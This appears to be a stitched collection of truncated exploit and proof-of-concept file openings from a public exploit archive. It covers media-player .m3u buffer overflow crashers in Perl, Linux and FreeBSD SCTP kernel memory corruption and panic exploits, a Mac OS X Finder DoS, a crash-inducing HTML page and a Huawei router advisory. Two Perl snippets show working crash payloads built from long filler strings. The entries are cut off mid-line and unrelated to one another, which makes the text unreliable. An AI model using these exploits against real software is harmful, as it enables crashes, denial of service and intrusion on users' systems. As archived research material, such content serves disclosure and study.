#!/usr/bin/perl# Found By: PLATEN# yPlay Player 1.0 (.mp3 ) Local File Crash PoC# http://www.spacejock.com/yPlay_Download.html# web: Blog: Www.platen.gigfa.coM ~ Www.pentesters.Ir# Greetings: b3hz4d ~ Cru3l.b0y ~ Cdef3nder ~ Snake and all members in
/* CVE-2009-0065 SCTP FWD Chunk Memory Corruption * Linux Kernel 2.6.x SCTP FWD Memory COrruption Remote Exploit * * coded by: sgrakkyu at antifork.org * http://kernelbof.blogspot.com * * * NOTE: you need at least one sctp application bound on the ta
!DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.01 Transitional http://www.w3.org/TR/html4/strict.dtd html body div style = width: 100%; max-height: 400px; overflow: scroll; script type=text/javascript src=nichtvorhanden/script script type=text/javascript/sc
#!/usr/bin/perl # FoxPlayer 1.1.0 (m3u) local stack overlow POC #finded by opt!x hacker optix@9.cn #download : http://files.brothersoft.com/regnow/fox-player-setup.exe my $header=#M3u; my $crash=A x 11500; my $poc=$crash; open(myfile,'AIDI.m3u'); pri
#!/usr/bin/perl #iRehearse (m3u) local stack overlow POC #finded by opt!x hacker optix@9.cn #download : http://rjvmedia.co.uk/software/iRehearseTrial.zip my $header=MILW0RM; my $crash=A x 40; my $poc=$header.$crash; open(myfile,'aidi.m3u'); print myf
#!/usr/bin/env python import os; print ############################################################################### # # # Mac OS X 10.5.7 Local Finder.app DoS (.CHM) # # By: Dr_IDE and s0kket # # Greets to offsec # # Tested on OS X 10.5.7 (This w
Description:Huawei MT880 is a device offered by the algerian telecom operator - FAWRI, to provide ADSL Internet connexion and it's already widely in use.Overview:Huawei MT880 firmware and its default configuration has flaws, which allows LAN users t
#!/usr/bin/perl # by hack4love # hack4love@hotmail.com # A2 Media Player ProV2.51(.m3u /m3l)Universal Local Buffer Exploit (SEH) # ## easy #### this work sooooooooo good#################################### ############################################
#!/usr/bin/env python ########################################################################################### # # JetAudio 7.5.3.15 Local Crash PoC # Found By: Dr_IDE # Download: http://www.cowonamerica.com/download/ # Tested on Windows XP SP2 #
/* fbsd-sctp-panic.c * * freebsd 7.2-RELEASE SCTP local kernel DoS (kern panic) * only tested on 7.2-RELEASE, probably older and newer builds are vuln. as well * based on an unfixed bug found here: http://www.freebsd.org/cgi/query-pr.cgi?pr=136803 *